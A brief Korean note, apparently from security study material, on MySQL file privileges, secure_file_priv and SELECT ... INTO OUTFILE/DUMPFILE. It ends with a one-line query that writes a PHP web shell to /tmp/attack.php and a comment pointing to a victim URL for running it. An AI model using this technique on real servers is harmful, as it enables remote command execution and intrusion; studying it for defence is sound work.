MySQL은 mysql이라는 user의 권한으로 파일 관련된 작업을 수행한다. my.cnf 파일 안의 설정 값 secure_file_priv의 설정에 따라 load_file, into outfile을 실행할 수 있다. 파일에 대한 관련 작업을 할 때는 디렉터리 / 파일의 권한을 가지고 있어야 한다.
SELECT ... INTO variable # column 값을 변수에 저장
SELECT ... INTO OUTFILE 'filename' # 쿼리 결과를 파일에 저장(rows)
SELECT ... INTO DUMPFILE 'filename' # 쿼리 결과를 파일에 저장(single)
# 명령어 저장
select'<? system(`ls`)?>'into outfile '/tmp/attack.php';
# http://victim.com/tmp/attack.php